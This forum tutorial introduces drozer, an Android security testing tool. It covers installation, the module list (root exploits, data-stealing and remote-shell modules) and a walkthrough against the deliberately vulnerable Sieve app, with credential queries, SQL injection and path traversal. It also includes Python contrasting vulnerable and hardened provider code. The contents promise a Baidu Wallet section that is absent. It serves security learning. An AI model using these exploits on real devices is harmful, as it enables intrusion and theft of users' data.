An introduction to drozer

Posted 2016-6-12 20:32:11

Contents
I. Installing drozer on Windows
II. Using drozer
III. drozer modules
    Find apps that can handle a given intent's data
    Find exported activities
    Start a given activity
IV. Worked example
V. Analysis of the Baidu Wallet app

I. Installing drozer on Windows
1. Download and install the console: https://labs.mwrinfosecurity.com ... installer-2.3.4.zip
   Agent for the device: https://labs.mwrinfosecurity.com ... zer-agent-2.3.4.apk
2. Open the drozer Agent on the device and switch on its embedded server
3. adb forward tcp:31415 tcp:31415
4. In the drozer directory run `drozer console connect`; the drozer banner appearing means the connection succeeded
II. Using drozer
General commands
usage: drozer [COMMAND]
Run `drozer [COMMAND] --help` for more usage information.
Commands:
         console  start the drozer Console
          module  manage drozer modules
          server  start a drozer Server
             ssl  manage drozer SSL key material
         exploit  generate an exploit to deploy drozer
           agent  create custom drozer Agents
         payload  generate payloads to deploy drozer

Module management
usage: module [COMMAND]
Run the drozer Module and Repository Manager.
The Repository Manager handles drozer Modules and Module Repositories.
positional arguments:
command             the command to execute
options
optional arguments:
  -h, --help
  -d, --descriptions  include descriptions when searching modules (search only)
  -f, --force         force install modules from the repositories (install only)
available commands:
commands    shows a list of all console commands
install     install a new module
remote      manage the source repositories, from which you install modules
repository  manage module repositories, on your local system
search      search for modules

Install every module (Windows cmd loop over the search results; this pulls and installs everything the configured repositories advertise, so check what those repositories contain first)
for /F %i in ('drozer module search') do drozer module install %i
List the available exploit modules
E:\drozer>drozer exploit list
exploit.remote.browser.addjavascriptinterface
    WebView addJavascriptInterface Remote Code Execution (CVE-2012-6636)
exploit.remote.browser.knoxsmdm
    Abuse the Newenrolment/UniversalMDMApplication application in Samsung Knox suite to install rogue drozer agent
exploit.remote.browser.nanparse
    Webkit Invalid NaN Parsing (CVE-2010-1807)
exploit.remote.browser.normalize
    Webkit Node Normalize (CVE-2010-1759)
exploit.remote.browser.useafterfree
    Webkit Use After Free Exploit (Black Hat 2010)
exploit.remote.dos.remotewipe_browserdelivery
    Invoke a USSD code that performs a remote wipe on Samsung Galaxy SIII (Ekoparty 2012)
exploit.remote.fileformat.polarisviewerbof_browserdelivery
    Deliver Polaris Viewer 4 exploit files over browser (Mobile Pwn2Own 2012)
exploit.remote.fileformat.polarisviewerbof_generate
    Generate Polaris Viewer 4 exploit DOCX (Mobile Pwn2Own 2012)
exploit.remote.socialengineering.unknownsources
    Deliver the Rogue drozer Agent over browser and hold thumbs the user will install it
exploit.usb.socialengineering.usbdebugging
    Install a Rogue drozer Agent on a connected device that has USB debugging enabled


Main console
E:\drozer>drozer console connect
Selecting 77dff31f0dc03413 (unknown Genymotion ('Phone' version) 2.3.7)
            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... . ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.
drozer Console (v2.3.4)
dz> help
drozer: Android Security Assessment Framework
Type `help COMMAND` for more information on a particular command, or `help
MODULE` for a particular module.
Commands:
cd     contributors  env   help  load    permissions  set    unset
clean  echo          exit  list  module  run          shell
Miscellaneous help topics:
Intents

load:   execute a file as a script
module: manage the drozer modules that can be run
run:    run a module
list:   list the modules that can be run

dz> list
app.activity.forintent                          Find activities that can handle the given intent
app.activity.info                               Gets information about exported activities.
app.activity.start                              Start an Activity
app.broadcast.info                              Get information about broadcast receivers
app.broadcast.send                              Send broadcast using an intent
app.broadcast.sniff                             Register a broadcast receiver that can sniff particular intents
app.package.attacksurface                       Get attack surface of package
app.package.backup                              Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP)
app.package.debuggable                          Find debuggable packages
app.package.info                                Get information about installed packages
app.package.launchintent                        Get launch intent of package
app.package.list                                List Packages
app.package.manifest                            Get AndroidManifest.xml of package
app.package.native                              Find Native libraries embedded in the application.
app.package.shareduid                           Look for packages with shared UIDs
app.provider.columns                            List columns in content provider
app.provider.delete                             Delete from a content provider
app.provider.download                           Download a file from a content provider that supports files
app.provider.finduri                            Find referenced content URIs in a package
app.provider.info                               Get information about exported content providers
app.provider.insert                             Insert into a Content Provider
app.provider.query                              Query a content provider
app.provider.read                               Read from a content provider that supports files
app.provider.update                             Update a record in a content provider
app.service.info                                Get information about exported services
app.service.send                                Send a Message to a service, and display the reply
app.service.start                               Start Service
app.service.stop                                Stop Service
auxiliary.develop.interactive                   Start an interactive Python shell
auxiliary.webcontentresolver                    Start a web service interface to content providers.
exploit.badauth.callme1                         Exploit CVE-2013-6272 to initiate or kill phone calls.
exploit.badauth.callme2                         Exploit CVE-2014-N/A to conduct phone calls or send special codes.
exploit.badauth.smsdraftsend                    Exploit CVE-2014-8610 Android < 5.0 SMS resend vulnerability (Baidu X-Team)
exploit.badauth.unlock                          Exploit CVE-2013-6271 to delete all locks on device.
exploit.jdwp.check                              Open @jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider              Reads APN content provider
exploit.pilfer.general.settingsprovider         Reads Settings content provider
exploit.pilfer.oem.samsung.accuweather          Tests for Content Provider vulnerability in com.sec.android.widgetapp.weatherclock.
exploit.pilfer.oem.samsung.appassword           Tests for vulnerability in content://settings/secure, that reveals Personal Hotspot AP password.
exploit.pilfer.oem.samsung.channelssms          Tests for Content Provider vulnerability in com.android.providers.telephony.
exploit.pilfer.oem.samsung.im                   Tests for Content Provider vulnerability in com.sec.android.im.
exploit.pilfer.oem.samsung.logs.email           Tests for Content Provider vulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.im              Tests for Content Provider vulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.messaging       Tests for Content Provider vulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.memo                 Tests for Content Provider vulnerability in com.sec.android.app.memo.
exploit.pilfer.oem.samsung.minidiary            Tests for Content Provider vulnerability in com.sec.android.app.minidiary.
exploit.pilfer.oem.samsung.postit               Tests for Content Provider vulnerability in com.sec.android.widgetapp.postit.
exploit.pilfer.oem.samsung.social_hub.im        Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.impassword
                                                Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.instantmessages
                                                Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.messages  Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.registeredaccounts
                                                Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.thirdparty.idea.superbackup.calls
                                                Grab call logs exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.contacts
                                                Grab Contact details exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.smses
                                                Grab SMS messages exported by Super Backup
exploit.pilfer.thirdparty.inkpad.notes.list     Lists notes created with the InkPad application
exploit.pilfer.thirdparty.inkpad.notes.note     Reads notes created with the InkPad application.
exploit.pilfer.thirdparty.maildroid.emails      Grab Email messages from MailDroid
exploit.pilfer.thirdparty.seesmic.twitter.oauthtokens
                                                Extracts the Twitter Secret from Seesmic
exploit.pilfer.thirdparty.shazam.gps            Extract GPS location information.
exploit.pilfer.thirdparty.sophos.mobilecontrol.messages
                                                Steal the Messages database from Sophos Mobile Control
exploit.root.cmdclient                          Obtain a root shell on an Acer Iconia and various Motorola devices.
exploit.root.exynosmem                          Obtain a root shell on Samsung Galaxy S2, S3, Note 2 and some other devices.
exploit.root.huaweip2                           Obtain a root shell on a Huawei P2.
exploit.root.mmap_abuse                         Iterate through all devices and attempt to exploit them to gain a root shell by abusing the mmap device operation.
exploit.root.towelroot                          Obtain a root shell on devices running Android 4.4 KitKat and/or kernel build date < Jun 3 2014.
exploit.root.ztesyncagent                       Obtain a root shell on a ZTE Score M and ZTE Skate.
information.datetime                            Print Date/Time
information.deviceinfo                          Get verbose device information
information.permissions                         Get a list of all permissions used by packages on the device
intents.fuzzinozer                              fuzzinozer
post.capture.clipboard                          Retrieve and display the current clipboard text.
post.capture.location                           Get last known GPS coordinates of user
post.capture.screenrecording                    Take a video recording of the device's screen
post.capture.screenshot                         Take a screenshot of the device
post.perform.setclipboard                       Put the specified text into the clipboard.
post.perform.startinstalledagent                Start installed drozer agent.
post.pivot.portforward                          Start a port forward
scanner.activity.browsable                      Get all BROWSABLE activities that can be invoked from the web browser
scanner.malware.virustotal                      Virus Scanner
scanner.misc.checkjavascriptbridge              Check if addJavascriptInterface is used and can be abused
scanner.misc.native                             Find native components included in packages
scanner.misc.readablefiles                      Find world-readable files in the given folder
scanner.misc.secretcodes                        Search for secret codes that can be used from the dialer
scanner.misc.securerandom                       SecureRandom Check
scanner.misc.sflagbinaries                      Find suid/sgid binaries in the given folder (default is /system).
scanner.misc.weburls                            Find HTTP and HTTPS URLs specified in packages.
scanner.misc.writablefiles                      Find world-writable files in the given folder
scanner.oem.samsung                             Test for multiple Samsung content provider vulnerabilities
scanner.provider.finduris                       Search for content providers that can be queried from our context.
scanner.provider.injection                      Test content providers for SQL injection vulnerabilities.
scanner.provider.sqltables                      Find tables accessible through SQL injection vulnerabilities.
scanner.provider.traversal                      Test content providers for basic directory traversal vulnerabilities.
scanner.root.check                              Test for vulnerabilities that allow a malicious application to gain root access.
shell.exec                                      Execute a single Linux command.
shell.send                                      Send an ASH shell to a remote listener.
shell.start                                     Enter into an interactive Linux shell.
tools.file.download                             Download a File
tools.file.md5sum                               Get md5 Checksum of file
tools.file.size                                 Get size of file
tools.file.upload                               Upload a File
tools.misc.installcert                          Install CA certificate
tools.setup.busybox                             Install Busybox.
tools.setup.minimalsu                           Prepare 'minimal-su' binary installation on the device.
tools.setup.nmap                                Install Nmap.
tools.setup.sqlite3                             Install SQLite3.

III. drozer modules
Find apps that can handle a given intent's data
usage: run app.activity.forintent [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
              [--component PACKAGE COMPONENT] [--data-uri DATA_URI]
              [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
              [--mimetype MIMETYPE]

Find activities that can handle the formulated intent

Examples:
Find activities that can handle web addresses:

   dz> run app.activity.forintent
                --action android.intent.action.VIEW
                --data http://www.google.com

   Package name: com.android.browser
   Target activity: com.android.browser.BrowserActivity

(The module's own example writes --data, but the option it accepts is --data-uri, as the usage line shows.)

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
  -h, --help
  --action ACTION       specify the action to include in the Intent
  --category CATEGORY [CATEGORY ...]
                        specify the category to include in the Intent
  --component PACKAGE COMPONENT
                        specify the component name to include in the Intent
  --data-uri DATA_URI   specify a Uri to attach as data in the Intent
  --extra TYPE KEY VALUE
                        add a field to the Intent's extras bundle
  --flags FLAGS [FLAGS ...]
                        specify one-or-more flags to include in the Intent
  --mimetype MIMETYPE   specify the MIME type to send in the Intent

Find exported activities
usage: run app.activity.info [-h] [-a PACKAGE] [-f FILTER] [-i] [-u] [-v]

Gets information about exported activities.

Examples:
List activities exported by the Browser:

   dz> run app.activity.info --package com.android.browser
   Package: com.android.browser
     com.android.browser.BrowserActivity
     com.android.browser.ShortcutActivity
     com.android.browser.BrowserPreferencesPage
     com.android.browser.BookmarkSearch
     com.android.browser.AddBookmarkPage
     com.android.browser.widget.BookmarkWidgetConfigure

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
  -h, --help
  -a PACKAGE, --package PACKAGE
                        specify the package to inspect
  -f FILTER, --filter FILTER
                        specify a filter term for the activity name
  -i, --show-intent-filters
                        specify whether to include intent filters
  -u, --unexported      include activities that are not exported
  -v, --verbose         be verbose

Start a given activity
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
              [--component PACKAGE COMPONENT] [--data-uri DATA_URI]
              [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
              [--mimetype MIMETYPE]

Starts an Activity using the formulated intent.

Examples:
Start the Browser with an explicit intent:

   dz> run app.activity.start
                --component com.android.browser
                           com.android.browser.BrowserActivity
                --flags ACTIVITY_NEW_TASK

If no flags are specified, drozer will add the ACTIVITY_NEW_TASK flag. To launch
an activity with no flags:

   dz> run app.activity.start
                --component com.android.browser
                           com.android.browser.BrowserActivity
                --flags 0x0

Starting the Browser with an implicit intent:

   dz> run app.activity.start
                --action android.intent.action.VIEW
                --data-uri http://www.google.com
                --flags ACTIVITY_NEW_TASK

For more information on how to formulate an Intent, type 'help intents'.

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
  -h, --help
  --action ACTION       specify the action to include in the Intent
  --category CATEGORY [CATEGORY ...]
                        specify the category to include in the Intent
  --component PACKAGE COMPONENT
                        specify the component name to include in the Intent
  --data-uri DATA_URI   specify a Uri to attach as data in the Intent
  --extra TYPE KEY VALUE
                        add a field to the Intent's extras bundle
  --flags FLAGS [FLAGS ...]
                        specify one-or-more flags to include in the Intent
  --mimetype MIMETYPE   specify the MIME type to send in the Intent



IV. Worked example
1. Download and install the Sieve app: http://mwr.to/sieve
2. Find the package name
dz> run app.package.list -f sieve
com.mwr.example.sieve
3. Basic package information
dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  Process Name: com.mwr.example.sieve
  Version: 1.0
  Data Directory: /data/data/com.mwr.example.sieve
  APK Path: /data/app/com.mwr.example.sieve-2.apk
  UID: 10056
  GID: [1028, 1015, 3003]
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - android.permission.READ_EXTERNAL_STORAGE
  - android.permission.WRITE_EXTERNAL_STORAGE
  - android.permission.INTERNET
  Defines Permissions:
  - com.mwr.example.sieve.READ_KEYS
  - com.mwr.example.sieve.WRITE_KEYS
4. Find the attack surface
dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
  3 activities exported
  0 broadcast receivers exported
  2 content providers exported
  2 services exported
    is debuggable
Exported activities (reachable from any other app on the device)
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
Exported content providers
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  Authority: com.mwr.example.sieve.DBContentProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.DBContentProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
  Path Permissions:
    Path: /Keys
      Type: PATTERN_LITERAL
      Read Permission: com.mwr.example.sieve.READ_KEYS
      Write Permission: com.mwr.example.sieve.WRITE_KEYS
  Authority: com.mwr.example.sieve.FileBackupProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.FileBackupProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
Only the /Keys path carries a permission; every other path of DBContentProvider, and the whole of FileBackupProvider, can be read and written by any app on the device.
Try starting the exported password-list activity directly, without going through MainLoginActivity
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
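The attack-surface counts above follow from the platform's default-export rules, which are worth knowing when the manifest rather than drozer is in front of you. The Python below is an added example, not code from this post or from drozer: it reads a constructed manifest that mirrors what drozer reports for Sieve (the targetSdkVersion, SettingsActivity and LocalReceiver are assumptions) and applies those rules: an explicit android:exported wins; activities, services and receivers are otherwise exported when they declare an intent-filter; providers are otherwise exported when targetSdkVersion is 16 or lower.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest mirroring what drozer reported for Sieve; the
# targetSdkVersion, SettingsActivity and LocalReceiver are assumptions.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.mwr.example.sieve">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".FileSelectActivity" android:exported="true"/>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".SettingsActivity"/>
    <service android:name=".AuthService" android:exported="true"/>
    <service android:name=".CryptoService" android:exported="true"/>
    <receiver android:name=".LocalReceiver" android:exported="false">
      <intent-filter><action android:name="com.mwr.example.sieve.TICK"/></intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="com.mwr.example.sieve.DBContentProvider"/>
    <provider android:name=".FileBackupProvider"
              android:authorities="com.mwr.example.sieve.FileBackupProvider"/>
  </application>
</manifest>
"""


def is_exported(component, target_sdk):
    """Default-export rules for one manifest component element."""
    explicit = component.get(ANDROID + "exported")
    if explicit is not None:                       # an explicit attribute wins
        return explicit.lower() == "true"
    if component.tag == "provider":                # providers: decided by SDK level
        return target_sdk <= 16
    return component.find("intent-filter") is not None   # others: by intent-filter


def attack_surface(manifest_xml):
    """Exported components per kind plus the debuggable flag: the same facts
    app.package.attacksurface summarises."""
    root = ET.fromstring(manifest_xml.strip())
    app = root.find("application")
    sdk = root.find("uses-sdk")
    target_sdk = 1
    if sdk is not None:   # targetSdkVersion falls back to minSdkVersion, then 1
        target_sdk = int(sdk.get(ANDROID + "targetSdkVersion")
                         or sdk.get(ANDROID + "minSdkVersion") or "1")
    kinds = ("activity", "receiver", "provider", "service")
    surface = {kind: [] for kind in kinds}
    surface["debuggable"] = app.get(ANDROID + "debuggable", "false").lower() == "true"
    for kind in kinds:
        for comp in app.findall(kind):
            if is_exported(comp, target_sdk):
                surface[kind].append(comp.get(ANDROID + "name"))
    return surface


def report(surface):
    """Render in the layout drozer uses for its Attack Surface summary."""
    lines = ["Attack Surface:",
             "  %d activities exported" % len(surface["activity"]),
             "  %d broadcast receivers exported" % len(surface["receiver"]),
             "  %d content providers exported" % len(surface["provider"]),
             "  %d services exported" % len(surface["service"])]
    if surface["debuggable"]:
        lines.append("    is debuggable")
    return "\n".join(lines)


if __name__ == "__main__":
    s = attack_surface(SAMPLE_MANIFEST)
    print(report(s))
    for kind in ("activity", "provider", "service"):
        for name in s[kind]:
            print("  exported %s: %s" % (kind, name))
```

The receiver shows the first rule: it has an intent-filter but an explicit exported="false", so it does not count. Changing the constructed targetSdkVersion to 17 flips both providers to not exported, which is why the SDK level is the first thing to check when a provider shows up with no explicit attribute.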
5. Attacking the content providers
Because the /Passwords path has no read permission, the stored credentials can be queried from the drozer agent without holding any permission:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
email: incognitoguy50@gmail.com
SQL injection
A single quote in the projection or the selection produces a SQLite syntax error whose text shows both values being pasted straight into the statement:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
Content provider weaknesses found by the scanner modules
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
Note that /Keys/ (with a trailing slash) is listed even though /Keys is permission-protected: the path permission is a literal match on /Keys, so the trailing slash sidesteps it.
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
  content://com.mwr.example.sieve.FileBackupProvider/
  content://com.mwr.example.sieve.FileBackupProvider
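The two scanner findings come from the same mistake: caller-controlled input used once as SQL text and once as a file path. The Python below is an added example, not Sieve's or drozer's code: it models each weakness with a vulnerable function beside a hardened one, using an in-memory SQLite database and a temporary directory layout that are constructed for the demo (the Keys table layout and the file names are assumptions, not Sieve's real schema).

```python
import os
import sqlite3
import tempfile

# Columns the provider is willing to return for the /Passwords path
PASSWORD_COLUMNS = ("_id", "service", "username", "password", "email")


def make_db():
    """In-memory stand-in for the provider's database (rows are constructed;
    the Keys table layout is an assumption, not Sieve's real schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT,
                               username TEXT, password TEXT, email TEXT);
        CREATE TABLE Keys(Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES(1, 'Email', 'incognitoguy50',
                                     'PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==',
                                     'incognitoguy50@gmail.com');
        INSERT INTO Keys VALUES('master-password', '1234');
    """)
    return con


# --- SQL injection -------------------------------------------------------
def query_vulnerable(con, projection="*", selection=None):
    """Builds the statement the way the error messages above reveal:
    projection and selection are pasted straight into the SQL text."""
    sql = "SELECT %s FROM Passwords" % projection
    if selection is not None:
        sql += " WHERE (%s)" % selection
    return con.execute(sql).fetchall()


def query_hardened(con, projection=None, where_column=None, where_value=None):
    """Projection and filter column must name known columns; the filter value
    is bound as a parameter, so it can never change the statement's shape."""
    cols = tuple(projection) if projection else PASSWORD_COLUMNS
    wanted = cols + ((where_column,) if where_column else ())
    unknown = [c for c in wanted if c not in PASSWORD_COLUMNS]
    if unknown:
        raise ValueError("unknown column(s): %s" % ", ".join(unknown))
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    params = ()
    if where_column:
        sql += " WHERE (%s = ?)" % where_column
        params = (where_value,)
    return con.execute(sql, params).fetchall()


# --- Directory traversal -------------------------------------------------
def make_fs():
    """Constructed layout: <tmp>/data/app is the app's private directory
    holding backup.db; <tmp>/outside/secret stands in for a file the
    provider must never serve (another app's data, /etc/hosts, ...)."""
    root = tempfile.mkdtemp()
    data_dir = os.path.join(root, "data", "app")
    os.makedirs(data_dir)
    with open(os.path.join(data_dir, "backup.db"), "wb") as f:
        f.write(b"backup-contents")
    outside = os.path.join(root, "outside")
    os.makedirs(outside)
    secret = os.path.join(outside, "secret")
    with open(secret, "wb") as f:
        f.write(b"not-yours")
    return data_dir, secret


def open_file_vulnerable(uri_path):
    """The URI path is used as the file path unchanged, so any absolute path
    (or one climbing with ..) is served with the provider's UID."""
    with open(uri_path, "rb") as f:
        return f.read()


def open_file_hardened(data_dir, uri_path):
    """Resolve the requested path under the private directory and refuse
    anything that does not stay inside it (absolute paths and .. included)."""
    base = os.path.realpath(data_dir)
    target = os.path.realpath(os.path.join(base, uri_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("refusing %r: outside %s" % (uri_path, base))
    with open(target, "rb") as f:
        return f.read()


if __name__ == "__main__":
    con = make_db()
    print(query_vulnerable(con, "* FROM Keys--"))      # injected projection reads Keys
    print(query_hardened(con, ("service", "username"), "service", "Email"))
    data_dir, secret = make_fs()
    print(open_file_vulnerable(secret))                # served: b'not-yours'
    try:
        open_file_hardened(data_dir, secret)
    except PermissionError as e:
        print(e)
```

Run as a script, the injected projection turns `SELECT * FROM Passwords` into `SELECT * FROM Keys-- FROM Passwords` and returns the other table, which is the same trick the scanner's "Injection in Projection" finding enables. Allowlisting columns and binding the filter value are the provider-side fixes for the query; declaring a read permission on /Passwords is the other half. For the file provider the check is on the resolved path, not the string, so `..` segments and symlinks are handled alike.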
6. Attacking the services
dz> run app.service.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.AuthService
    Permission: null
  com.mwr.example.sieve.CryptoService
    Permission: null
Both services are exported with no permission, so any app on the device can bind to them and send them Messages (app.service.send) without authenticating.
Posted on the 技术宅的结界 forum
